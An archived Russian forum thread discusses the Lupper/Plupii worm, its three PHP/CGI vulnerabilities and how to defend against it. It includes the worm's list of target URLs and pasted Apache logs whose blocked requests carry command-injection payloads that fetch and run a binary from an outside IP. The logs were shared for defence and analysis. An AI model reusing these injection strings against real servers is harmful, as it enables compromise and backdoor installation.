Новый Linux червь.

0

0

Lupper (по версии McAfee) или Plupii (по версии Symantec) использует три уязвимости (внедрение удаленного кода в XML-RPC for PHP, неполную проверку параметров в Rawlog-плагине для анализатора логов AWStats и удаленное исполнение кодов в скрипте Webhints) для распространения по хостящим эти скрипты серверам, после чего устанавливает на зараженных серверах бэкдоры.

>>> Подробности

Ссылка

←	GNU/Solaris - реальность!

Дни разработчика Trolltech в Мюнхене

→

← 1 2 →

А что, у кого-то апач с PHP с рутовыми правами бегает?

~~suser~~
(08.11.05 10:05:37 MSK)

Ответ на: комментарий от suser 08.11.05 10:05:37 MSK

Дык он и не получает рута, просто открывает бэкдор.

xnix ★★
(08.11.05 10:09:43 MSK) автор топика

Ссылка

Мдя ... вот и для попсовых продуктов стали вирусы ваять ....

robot12 ★★★★★
(08.11.05 10:09:56 MSK)

Ссылка

Хиленький какой-то червячокс - и дыры для него уже залатаны и найти его можно с трудом... Никакого тебе удовольствия. То ли дело в Виндовс - пока МС раскачается, туча пользователей уже рогом станет.

~~Linfan~~ ★★★★★
(08.11.05 10:10:03 MSK)

Защита простая:
На сайте McAfee есть список стандартных урлов, по которым он атакует, нужно просто от них избавиться
http://[website]/cgi-bin/
http://[website]/scgi-bin/
http://[website]/cgi-bin/awstats/
http://[website]/scgi-bin/awstats/
http://[website]/cgi/awstats/
http://[website]/scgi/awstats/
http://[website]/scripts/
http://[website]/cgi-bin/stats/
http://[website]/scgi-bin/stats/
http://[website]/stats/
http://[website]/xmlrpc.php
http://[website]/xmlrpc/xmlrpc.php
http://[website]/xmlsrv/xmlrpc.php
http://[website]/blog/xmlrpc.php
http://[website]/drupal/xmlrpc.php
http://[website]/community/xmlrpc.php
http://[website]/blogs/xmlrpc.php
http://[website]/blogs/xmlsrv/xmlrpc.php
http://[website]/blog/xmlsrv/xmlrpc.php
http://[website]/blogtest/xmlsrv/xmlrpc.php
http://[website]/b2/xmlsrv/xmlrpc.php
http://[website]/b2evo/xmlsrv/xmlrpc.php
http://[website]/wordpress/xmlrpc.php
http://[website]/phpgroupware/xmlrpc.php
http://[website]/cgi-bin/includer.cgi
http://[website]/sgi-cgi/includer.cgi
http://[website]/includer/cgi
http://[website]/cgi-bin/include/includer.cgi
http://[website]/scgi-bin/include/includer.cgi
http://[website]/cgi-bin/inc/includer.cgi
http://[website]/scgi-bin/inc/includer.cgi
http://[website]/cgi-local/includer.cgi
http://[website]/scgi-local/includer.cgi
http://[website]/cgi/includer.cgi
http://[website]/scgi/includer.cgi
http://[website]/hints.pl
http://[website]/cgi/hints.pl
http://[website]/scgi/hints.pl
http://[website]/cgi-bin/hints.pl
http://[website]/scgi-bin/hints.pl
http://[website]/hints/hints.pl
http://[website]/cgi-bin/webhints/hints.pl
http://[website]/scgi-bin/webhints/hints.pl
http://[website]/hints.cgi
http://[website]http://[website]/cgi/hints.cgi
http://[website]/scgi/hints.cgi
http://[website]/cgi-bin/hints.cgi
http://[website]/scgi-bin/hints.cgi
http://[website]/hints/hints.cgi
http://[website]/cgi-bin/hints/hints.cgi
http://[website]/scgi-bin/hints/hints.cgi
http://[website]/webhints/hints.cgi
http://[website]/cgi-bin/webhints/hints.cgi
http://[website]/scgi-bin/webhints/hints.cgi

FatBastard ★★
(08.11.05 10:11:29 MSK)

Ответ на: комментарий от Linfan 08.11.05 10:10:03 MSK

Сейчас начнутся нападки оффтопичников с очередным GTF :) и аргументом будет именно этот червяк :)

robot12 ★★★★★
(08.11.05 10:14:03 MSK)

Ответ на: комментарий от robot12 08.11.05 10:14:03 MSK

я вообще про австатс и уебхинтс первый раз в жизни слышу...

что это за хрень и чем оно лучше вебалайзера?

gr_buza ★★★★
(08.11.05 10:15:46 MSK)

Ссылка

Ответ на: комментарий от FatBastard 08.11.05 10:11:29 MSK

Избавиться от http://[website]/cgi-bin/ ? это круто :)

~~Linfan~~ ★★★★★
(08.11.05 10:17:16 MSK)

Ответ на: комментарий от FatBastard 08.11.05 10:11:29 MSK

Чем более стандартна система тем более вероятность получения какой нить фигни ... IMHO :)

robot12 ★★★★★
(08.11.05 10:18:30 MSK)

Ссылка

Ответ на: комментарий от Linfan 08.11.05 10:17:16 MSK

А что cgi-bin сложно переименовать ? или никак нельзя ?

robot12 ★★★★★
(08.11.05 10:20:54 MSK)

Ответ на: комментарий от FatBastard 08.11.05 10:11:29 MSK

Перевожу сайты на http://[website]/`random|md5` удаленно по вашему урлу

anonymous
(08.11.05 10:22:23 MSK)

Ссылка

Ответ на: комментарий от Linfan 08.11.05 10:17:16 MSK

Что крутого в избавлении от cgi-bin?

anonymous
(08.11.05 10:24:30 MSK)

Ответ на: комментарий от anonymous 08.11.05 10:24:30 MSK

>Что крутого в избавлении от cgi-bin?
От индекса в папке cgi-bin

FatBastard ★★
(08.11.05 10:39:29 MSK)

Ссылка

Ответ на: комментарий от anonymous 08.11.05 10:24:30 MSK

в конфиге апача прописать вместо cgi-bin cgi-bin1 и переименовать соотв. директорию - покатит? А остальное - у кого - нибудь это есть?

anonymous
(08.11.05 10:41:13 MSK)

Ссылка

Ну что пых-пыхщики, кто там говорил, что Perl эквивалентен шеллу и вообще PHP дюже безопасен для хоста в отличие от?

anonymous
(08.11.05 10:44:00 MSK)

PHP=PeopleHaveProblems

Cybem ★★
(08.11.05 10:47:57 MSK)

Ответ на: комментарий от robot12 08.11.05 10:20:54 MSK

если ты хостишся и не имеешь доступа к настройкам апача - то переименовать то несложно, но скрипты куда потом девать? :)

~~Linfan~~ ★★★★★
(08.11.05 11:01:25 MSK)

Банально конечно.. Но причем тут _LINUX_??? "Вот так рождаются нездоровые сенсации.." (c)

anonymous
(08.11.05 11:08:33 MSK)

Ответ на: комментарий от Linfan 08.11.05 11:01:25 MSK

>если ты хостишся и не имеешь доступа к настройкам апача - то переименовать то несложно, но скрипты куда потом девать? :)

.htaccess поможет отцу русского хостинга? :) Хм. Тогда - это, скорее, проблема хостера. Если даже у меня, как хостующегося, все правильно, то общие проблемы сведут на нет всю работу. Насколько я понял, весь вопрос в связке четырех компонент. Если какой - то не хватает, то вопрос отпадает сам собой. Cinik в свое время покруче был. Ему нужна была только определенная версия апача.

anonymous
(08.11.05 11:38:29 MSK)

Ответ на: комментарий от anonymous 08.11.05 11:08:33 MSK

Вот именно, причем тут линукс?

tmp
(08.11.05 11:45:57 MSK)

Ссылка

А что, на винде не заработает?

tmp
(08.11.05 11:46:55 MSK)

Ссылка

Ответ на: комментарий от anonymous 08.11.05 11:38:29 MSK

ну вообщем-то да, и данный топик больше должен волновать хостеров.

~~Linfan~~ ★★★★★
(08.11.05 11:56:29 MSK)

Ссылка

а что делать тем, у кого на web-сервере нет mod_php, только mod_perl?

vadiml ★★★★★
(08.11.05 12:03:04 MSK)

Ответ на: комментарий от vadiml 08.11.05 12:03:04 MSK

>а что делать тем, у кого на web-сервере нет mod_php, только mod_perl?

пейте бром :)))

mit
(08.11.05 12:10:04 MSK)

Ответ на: комментарий от mit 08.11.05 12:10:04 MSK

> пейте бром :)))

хеннеси или работягу джонни

anonymous
(08.11.05 12:16:55 MSK)

Ответ на: комментарий от suser 08.11.05 10:05:37 MSK

> А что, у кого-то апач с PHP с рутовыми правами бегает?

А в федоре, наверно, именно так по дефолту? В мир линукса влилось очень много дятлов, у которых может быть что угодно :)

anonymous
(08.11.05 12:19:49 MSK)

Ответ на: комментарий от anonymous 08.11.05 12:19:49 MSK

>А в федоре, наверно, именно так по дефолту? В мир линукса влилось очень много дятлов, у которых может быть что угодно :)

А можно про мир линукса поподробнее? Надо расспросить у дворника про мир мусорных баков....

anonymous
(08.11.05 12:23:40 MSK)

Ссылка

Ответ на: комментарий от Linfan 08.11.05 10:17:16 MSK

http://[website]/cgi+bin/ слабо???

anonymous
(08.11.05 12:30:43 MSK)

Ответ на: комментарий от Linfan 08.11.05 10:10:03 MSK

> Хиленький какой-то червячокс - и дыры для него уже залатаны и найти его можно с трудом...

Виндузятники писали, небось. Они те ещё спецы в юниксах... :)

anonymous
(08.11.05 12:36:37 MSK)

Ответ на: комментарий от anonymous 08.11.05 12:36:37 MSK

А онанимусы - исключительно Юниксвэй? :)) Помимо коментов - оригинал читать пробовал? Или там буквы незнакомые? :))

~~Linfan~~ ★★★★★
(08.11.05 12:39:12 MSK)

Ответ на: комментарий от anonymous 08.11.05 12:30:43 MSK

Да переименовать то несложно, но если доступ к хостингу ограничен - это тебе поможет? :)) Проще саппорт нагнуть.

~~Linfan~~ ★★★★★
(08.11.05 12:41:10 MSK)

Ссылка

PHP - дырка от бублика

--седайко стюмчик

sedajko_stjumchik ★
(08.11.05 12:43:33 MSK)

Ссылка

Ответ на: комментарий от Linfan 08.11.05 12:39:12 MSK

Linfan, ты что? онанимус?

anonymous
(08.11.05 12:54:59 MSK)

Ссылка

Ответ на: комментарий от anonymous 08.11.05 12:16:55 MSK

Кто такой "работяга джонни"??? У меня есть смутные подозрения, но тогда это ЛОООЛ...

svu ★★★★★
(08.11.05 13:15:01 MSK)

Ответ на: комментарий от svu 08.11.05 13:15:01 MSK

LOL!!! ;-)))))

Deleted
(08.11.05 13:20:18 MSK)

Ответ на: комментарий от Deleted 08.11.05 13:20:18 MSK

А мне, я тоже поЛОООЛиться хочу! Об чем речь ведем?

anonymous
(08.11.05 13:25:28 MSK)

Эти дыры давно уже опубликованы, и должен быть пропатчен весь указанный софт..
Кстати вот из логов первые подснежники :)))

[Sun Nov 6 14:36:30 2005] [error] [client 157.82.250.66] File does not exist: /var/www/html/cgi-bin/awstats.pl
[Sun Nov 6 14:36:34 2005] [error] [client 157.82.250.66] File does not exist: /var/www/html/cgi-bin/awstats/awstats.pl
[Sun Nov 6 14:36:36 2005] [error] [client 157.82.250.66] File does not exist: /var/www/html/scgi-bin/awstats/awstats.pl
[Sun Nov 6 14:36:37 2005] [error] [client 157.82.250.66] File does not exist: /var/www/html/cgi/awstats/awstats.pl
[Sun Nov 6 14:36:54 2005] [error] [client 157.82.250.66] File does not exist: /var/www/html/xmlrpc.php
[Sun Nov 6 14:37:32 2005] [error] [client 157.82.250.66] mod_security: Access denied with code 400. Pattern match """" at THE_REQUEST. [hostname "x.x.x.x"] [uri "/cgi-local/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS""$IFS" ;"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS""$IFS"" ;`lupii;./lupii`echo$IFS""$IFS""`62.101.193.244|"] [unique_id Q23O3D6U5gIAAC6NK2g]
[Sun Nov 6 14:37:34 2005] [error] [client 157.82.250.66] mod_security: Access denied with code 400. Pattern match """" at THE_REQUEST. [hostname "x.x.x.x"] [uri "/scgi-local/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS""$IFS&quo t;"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS""$IFS"&quo t;`lupii;./lupii`echo$IFS""$IFS""`62.101.193.244|"] [unique_id Q23O3j6U5gIAAC6GKXs]
[Sun Nov 6 14:37:35 2005] [error] [client 157.82.250.66] mod_security: Access denied with code 400. Pattern match """" at THE_REQUEST. [hostname "x.x.x.x"] [uri "/cgi/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS""$IFS"" ;`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS""$IFS""`lupi i;./lupii`echo$IFS""$IFS""`62.101.193.244|"] [unique_id Q23O3z6U5gIAADEkELQ]
[Sun Nov 6 14:37:37 2005] [error] [client 157.82.250.66] mod_security: Access denied with code 400. Pattern match """" at THE_REQUEST. [hostname "x.x.x.x"] [uri "/scgi/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS""$IFS"&quo t;`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS""$IFS""`lup ii;./lupii`echo$IFS""$IFS""`62.101.193.244|"] [unique_id Q23O4T6U5gIAAC6MKp8]
[Sun Nov 6 14:37:39 2005] [error] [client 157.82.250.66] mod_security: Access denied with code 400. Pattern match """" at THE_REQUEST. [hostname "x.x.x.x"] [uri "/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS""$IFS""`62.101 .193.244/lupii;chmod$IFS+x$IFS`echo$IFS""$IFS""`lupii;./lupi i`echo$IFS""$IFS""`62.101.193.244|"] [unique_id Q23O4z6U5gIAADEjDzk]
[Sun Nov 6 14:37:40 2005] [error] [client 157.82.250.66] mod_security: Access denied with code 400. Pattern match """" at THE_REQUEST. [hostname "x.x.x.x"] [uri "/cgi/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS""$IFS""`62 .101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS""$IFS""`lupii;./ lupii`echo$IFS""$IFS""`62.101.193.244|"] [unique_id Q23O5D6U5gIAAGkIR7w]
[Sun Nov 6 14:37:42 2005] [error] [client 157.82.250.66] mod_security: Access denied with code 400. Pattern match """" at THE_REQUEST. [hostname "x.x.x.x"] [uri "/scgi/hints.pl?|cd$IFS/tmp;wget$IFS`echo$IFS""$IFS""`6 2.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS""$IFS""`lupii;. /lupii`echo$IFS""$IFS""`62.101.193.244|"] [unique_id Q23O5j6U5gIAAC6KKoo]

x97Rang ★★★
(08.11.05 13:35:44 MSK)

Ссылка

>If a system has been infected, Symantec recommends complete reinstallation of the system because it will be difficult to determine what else the computer has been exposed to, the company said.

Совсем обленились в Симантеке... До этого и так можно было догадаться =)))

~~gh0stwizard~~ ★★★★★
(08.11.05 13:40:15 MSK)

> Новый Linux червь

Так кто новый-то? Линукс или червь? Ксникс, ты вообще уроки русского языка в школе посещал(-аешь)?

anonymous
(08.11.05 13:43:36 MSK)

Ссылка

Ответ на: комментарий от anonymous 08.11.05 13:25:28 MSK

Я так полагаю о Johnie Walker :)

sigill ★
(08.11.05 14:01:42 MSK)

Ответ на: комментарий от anonymous 08.11.05 10:44:00 MSK

кстати perl опаснее чем php, хотя бы потому что в php можно отключить все системные функции типа passthru(), system() и др. и без них все работает, а с перлом .. только chroot спасет

хотя есть разработки и для ограничения perl и php в виде модуля ядра для linux - называется antikid

x97Rang ★★★
(08.11.05 14:18:49 MSK)

Ответ на: комментарий от x97Rang 08.11.05 14:18:49 MSK

>хотя есть разработки и для ограничения perl и php в виде модуля ядра для linux - называется antikid

А можно подробнее? Гугл ответа не дал.

anonymous
(08.11.05 14:27:23 MSK)

Ответ на: комментарий от x97Rang 08.11.05 14:18:49 MSK

Поподробнее можно? кстати, ключик -T не забыли еще для perl делать на сервере?

anonymous
(08.11.05 15:26:55 MSK)

Ссылка

Ответ на: комментарий от anonymous 08.11.05 14:27:23 MSK

http://www.ghc.ru/antikid/

Разработкой и отладкой занимается edisan

Сам пробовал патч - самое то для хостинга с php.

x97Rang ★★★
(08.11.05 15:48:33 MSK)

Ссылка

Не совсем понимаю, как это связано с Linux, если речь идет
про "внедрение удаленного кода в XML-RPC for PHP"? Скорее
всего надо было сказать, что появился очередной PHP червь,
а где уж это PHP крутится, совершенно не важно...

McMCC ★★★
(08.11.05 16:10:01 MSK)

Ответ на: комментарий от McMCC 08.11.05 16:10:01 MSK

>Не совсем понимаю, как это связано с Linux, если речь идет
>про "внедрение удаленного кода в XML-RPC for PHP"? Скорее
>всего надо было сказать, что появился очередной PHP червь,
>а где уж это PHP крутится, совершенно не важно...

Это связано с *NIX вообще, так как в венде нету папки /tmp.
И еще покажите мне вменяемого хостера у которого apache+php крутиться на маздае

FatBastard ★★
(08.11.05 16:27:13 MSK)

Ссылка

Ответ на: комментарий от Cybem 08.11.05 10:47:57 MSK

>Note: there's a security fix for SimpleXMLRPCServer.py in Python 2.2, 2.3 and 2.4. Versions before 2.2 are not vulnerable. Of the releases below, only 2.3.5 and 2.4.1 and later include the fix.

anonymous
(08.11.05 16:57:49 MSK)

Ответ на: комментарий от sigill 08.11.05 14:01:42 MSK

Johnie Walker - Иван Ходун

anonymous
(08.11.05 16:59:51 MSK)

Ответ на: комментарий от anonymous 08.11.05 16:59:51 MSK

>Johnie Walker - Иван Ходун

Хорошо, что не Ванька-Встанька :)

sigill ★
(08.11.05 17:14:27 MSK)

Ссылка

Ответ на: комментарий от anonymous 08.11.05 16:57:49 MSK

>Note: there's a security fix for SimpleXMLRPCServer.py in Python 2.2, 2.3 and 2.4. Versions before 2.2 are not vulnerable. Of the releases below, only 2.3.5 and 2.4.1 and later include the fix.

Note: February 3, 2005

Cybem ★★
(08.11.05 17:27:46 MSK)

Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.

← 1 2 →

←	GNU/Solaris - реальность!

Безопасность

Дни разработчика Trolltech в Мюнхене

→

Похожие темы